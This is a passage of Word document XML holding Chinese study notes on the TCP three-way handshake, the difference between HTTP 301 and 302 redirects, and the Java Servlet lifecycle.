          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00941586" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidR="00941586" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>：传输层协议，面向连接的可靠协议，建立起三次握手，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00941586" w:rsidRPr="00F41A4C" w:rsidRDefault="00941586" w:rsidP="00941586">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">     (1)  C</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>向</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>发送</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>SYN(seq=x)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>报文</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00941586" w:rsidRPr="00F41A4C" w:rsidRDefault="00941586" w:rsidP="00941586">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">     (2)  S</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>收到</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>SYN</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>报文，</w:t>
      </w:r>
      <w:r w:rsidR="001239F6" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>回应</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>SYN</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>seq=y</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>），</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ACK(seq=x+1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00941586" w:rsidRPr="00F41A4C" w:rsidRDefault="001239F6" w:rsidP="001239F6">
      <w:pPr>
        <w:ind w:firstLineChars="250" w:firstLine="525"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(3)  C</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>收到</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>SYN</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>报文，回应一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ACK(seq=y+1)</w:t>
      </w:r>
      <w:r w:rsidR="00BE1936" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>报文，进入建立连接状态。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00022A5D" w:rsidRPr="00A52F1C" w:rsidRDefault="00022A5D" w:rsidP="00A52F1C">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>6.</w:t>
      </w:r>
      <w:r w:rsidR="00F10244" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002243C6" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>HTTP301</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>302</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>区别</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00022A5D" w:rsidRPr="00E16C7B" w:rsidRDefault="00B910D3" w:rsidP="00E16C7B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00CE49AA" w:rsidRPr="00E16C7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>301</w:t>
      </w:r>
      <w:r w:rsidR="00CE49AA" w:rsidRPr="00E16C7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00CE49AA" w:rsidRPr="00E16C7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>302 </w:t>
      </w:r>
      <w:r w:rsidR="00CE49AA" w:rsidRPr="00E16C7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>都是</w:t>
      </w:r>
      <w:r w:rsidR="00CE49AA" w:rsidRPr="00E16C7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidR="00CE49AA" w:rsidRPr="00E16C7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>状态的编码，都代表着某个</w:t>
      </w:r>
      <w:r w:rsidR="00CE49AA" w:rsidRPr="00E16C7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="00CE49AA" w:rsidRPr="00E16C7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>发生了转移，不同之处在于：</w:t>
      </w:r>
      <w:r w:rsidR="00CE49AA" w:rsidRPr="00E16C7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00CE49AA" w:rsidRPr="00E16C7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00CE49AA" w:rsidRPr="00E16C7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>301 redirect: 301 </w:t>
      </w:r>
      <w:r w:rsidR="00CE49AA" w:rsidRPr="00E16C7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>代表永久性转移</w:t>
      </w:r>
      <w:r w:rsidR="00CE49AA" w:rsidRPr="00E16C7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(Permanently Moved)</w:t>
      </w:r>
      <w:r w:rsidR="00CE49AA" w:rsidRPr="00E16C7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00CE49AA" w:rsidRPr="00E16C7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00CE49AA" w:rsidRPr="00E16C7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>302 redirect: 302 </w:t>
      </w:r>
      <w:r w:rsidR="00CE49AA" w:rsidRPr="00E16C7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>代表暂时性转移</w:t>
      </w:r>
      <w:r w:rsidR="00CE49AA" w:rsidRPr="00E16C7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(Temporarily Moved )</w:t>
      </w:r>
      <w:r w:rsidR="00CE49AA" w:rsidRPr="00E16C7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00CE49AA" w:rsidRPr="00E16C7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006472FD" w:rsidRPr="00F41A4C" w:rsidRDefault="00EC576B" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006472FD" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Servlet</w:t>
      </w:r>
      <w:r w:rsidR="006472FD" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>生命周期</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00461BB6" w:rsidRPr="00F41A4C" w:rsidRDefault="00461BB6" w:rsidP="00461BB6">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>客户端请求该</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Servlet</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00461BB6" w:rsidRPr="00F41A4C" w:rsidRDefault="00461BB6" w:rsidP="00461BB6">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>加载</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Servlet </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>类到内存；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00461BB6" w:rsidRPr="00F41A4C" w:rsidRDefault="00461BB6" w:rsidP="00461BB6">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>实例化并调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>init()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>方法初始化该</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Servlet</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00461BB6" w:rsidRPr="00F41A4C" w:rsidRDefault="00461BB6" w:rsidP="00461BB6">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>service()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>（根据请求方法不同调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">doGet() </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> doPost()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，此外还有</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>doGet()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>doPut()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>doTrace()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>doDelete()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>doOptions()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
